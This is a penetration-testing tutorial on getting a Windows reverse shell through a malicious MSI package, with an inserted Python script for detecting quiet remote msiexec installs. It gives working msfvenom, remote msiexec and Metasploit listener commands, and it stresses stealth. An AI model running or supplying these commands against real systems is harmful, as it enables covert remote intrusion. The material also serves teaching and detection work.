Get the Reverse Shell with MSI package

Windows ships with the Windows Installer engine, which MSI packages use to install applications. The executable that interprets packages and installs products is msiexec.exe.

In penetration testing, MSI packages can be leveraged to obtain reverse shells on target Windows systems. This technique exploits the legitimate Windows Installer functionality to execute malicious payloads.

How It Works

The MSI reverse shell technique works by creating a malicious MSI package containing a reverse shell payload. When executed on the target system using msiexec, the package triggers the payload to establish a connection back to the attacker's machine.

[Figure: MSI Reverse Shell Attack Flow. Attacker (creates MSI with payload) → Target (executes MSI via msiexec) → Listener (receives connection). Steps: 1. Create malicious MSI → 2. Execute on target → 3. Establish reverse connection]

Generating MSI Package with msfvenom

Use msfvenom to generate an MSI package file containing the Windows Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

This command creates a malicious MSI file that, when executed, will attempt to connect back to the specified IP address and port.

Executing the MSI Package

On the target system, the victim executes the MSI file using the following command:

msiexec /q /i http://192.168.1.109/1.msi

The /q flag runs the installation quietly (without user interface), and /i specifies the installation package.

Setting Up the Listener

Before executing the MSI on the target, set up a listener using Metasploit's multi/handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit

Once the MSI package is executed on the target machine, the attacker receives a reverse shell connection through the established listener.

Key Points

  • Stealth execution − The /q flag ensures silent installation without alerting the user

  • Remote delivery − MSI packages can be hosted remotely and executed via HTTP URLs

  • Legitimate process − Uses Windows' built-in installer mechanism, making detection harder

  • Payload flexibility − Various payloads can be embedded within MSI packages
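The quiet, remotely sourced invocation shown above (msiexec /q /i with an HTTP URL) leaves a recognizable command line in process-creation logs. The following detection sketch is an added example, not part of the original article; the function names and the sample command lines (other than the article's own) are constructed for illustration.

```python
import re
import shlex

# msiexec accepts switches prefixed with "/" or "-"
QUIET = re.compile(r"^[/-](q[nbrf]?[+\-!]*|quiet)$", re.I)  # /q, /qn, /qb!, /quiet
INSTALL = re.compile(r"^[/-](i|package)$", re.I)            # /i, /package
REMOTE = re.compile(r"^(https?://|\\\\)", re.I)             # URL or UNC path

def classify(cmdline):
    """Return None for non-msiexec commands, else a dict describing the call."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        argv = cmdline.split()
    if not argv:
        return None
    image = argv[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image not in ("msiexec", "msiexec.exe"):
        return None
    args = [a.strip('"') for a in argv[1:]]
    quiet = any(QUIET.match(a) for a in args)
    source = None
    for i, a in enumerate(args):
        if INSTALL.match(a) and i + 1 < len(args):
            source = args[i + 1]                  # package follows the switch
    remote = bool(source and REMOTE.match(source))
    # Alert only when the package is remote AND the UI is suppressed
    return {"quiet": quiet, "source": source, "remote": remote,
            "alert": quiet and remote}

def scan(cmdlines):
    """Return the command lines that should raise an alert."""
    hits = []
    for line in cmdlines:
        result = classify(line)
        if result and result["alert"]:
            hits.append(line)
    return hits

# Constructed process-creation command lines; the first is the article's command
SAMPLE_EVENTS = [
    r"msiexec /q /i http://192.168.1.109/1.msi",
    r"C:\Windows\System32\msiexec.exe /i C:\Installers\app.msi /qn",
    r"msiexec.exe -I https://updates.example.com/agent.msi -quiet",
    r"msiexec /i \\fileserver\share\tool.msi",
    r"notepad.exe report.txt",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT quiet remote MSI install:", hit)
```

The same condition (msiexec, a quiet switch, and a URL or UNC package source) can be expressed as a rule over Sysmon Event ID 1 or Windows Security Event ID 4688 command-line fields.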

Conclusion

MSI packages provide an effective method for obtaining reverse shells by leveraging Windows' legitimate installer functionality. This technique combines msfvenom payload generation with msiexec execution to establish covert connections back to the attacker's system.

Updated on: 2026-03-16T23:36:12+05:30
